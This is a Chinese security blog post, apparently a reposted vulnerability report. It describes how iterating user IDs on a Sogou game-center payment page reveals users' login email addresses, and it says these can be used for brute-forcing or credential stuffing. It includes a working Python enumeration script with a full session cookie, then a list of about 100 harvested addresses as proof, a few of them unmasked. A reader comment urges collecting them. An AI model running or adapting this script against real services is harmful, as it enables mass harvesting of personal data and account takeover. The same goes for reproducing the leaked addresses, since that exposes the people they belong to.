搜狗6000万用户登录邮箱可通过uid遍历

  • A+
所属分类:网络安全

1.sogou游戏中心站点http://wan.sogou.com/p/index.do

2.充值处,可以为他人充值

该处可以通过遍历uid来获取其他用户的邮箱信息,用作暴力破解或者撞裤

通过测试uid,有6000万+用户

POST请求包如下:

搜狗6000万用户登录邮箱可通过uid遍历

 

附上Py脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
code 区域
if __name__ == '__main__':
for i in range (1000):
params=urllib.urlencode({'gid':'233','sid':'21','paygate':'-331','amount':'10','uid':i})
headers={
"Cookie":"IPLOC=CN2100; SUID=63043D777D23900A000000005552F7EA; SUV=00D766AC773D04635552F7EB7AADD090; usid=63043D7730890E0A000000005563D38A; CNZZDATA1255303155=1173610824-1438220021-%7C1438220021; swfLayer=1; ppinf=5|1438220959|1439430559|Y2xpZW50aWQ6NDoxMTAwfGNydDoxMDoxNDM4MjIwOTU5fHJlZm5pY2s6MDp8dHJ1c3Q6MToxfHVzZXJpZDoxOTpkb250c2F5aGVoZUAxNjMuY29tfHVuaXFuYW1lOjk6MTEyMzQyMzExfA; pprdig=pgpiRH6X-cilVdO8pLT6V2s5gcos7yfRdrabmaNieW1v0MJawaw-M3qUMkNr_hovhIZZ0ZeQsD7yPnehRoZrb5BJA8bY5BDKs1awJwVDqhlPsLplQrsWSXB3hrUYGXTdKKhCgV-a3Pwi6qeSlGF6iJ4lD_qeDE8PifX6cA1GZDA; email=**********; SSUID=BEF747DFDC68FA329D3F93994957BE5A; ppmdig=1438220960000000dd5308bce1c345c0d36e8be0ae55856e; hostid=40731406; JSESSIONID=aaaiTZSNM3yNBghhKPC7u",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8","Connection":"keep-alive",
"Pragma":"no-cache","Cache-Control":"no-cache","Accept":"*/*","Accept-Language":"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"
}

conn = httplib.HTTPConnection('wan.sogou.com','80',True,2)
conn.request(method="POST",url="/payconfirm.do",body=params,headers=headers)
response = conn.getresponse()
body = response.read()
usermail = re.findall(r'(?<= id="dUid" class="font-black">).*?(?=

)'
,body)
print usermail[0]

漏洞证明:

频率不要太快,跑了100个测试下。
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
jim.@sogou.com
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
a1554567397@sogou.com
wm798200@focus.cn
abc-.@sogou.com
zhou1786962732@sogou.com

SS推荐
avatar

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:2   其中:访客  2   博主  0

    • avatar 日后再说 0

      程序猿也是图省事

      • avatar 王华龙 9

        厉害了这个.收集起来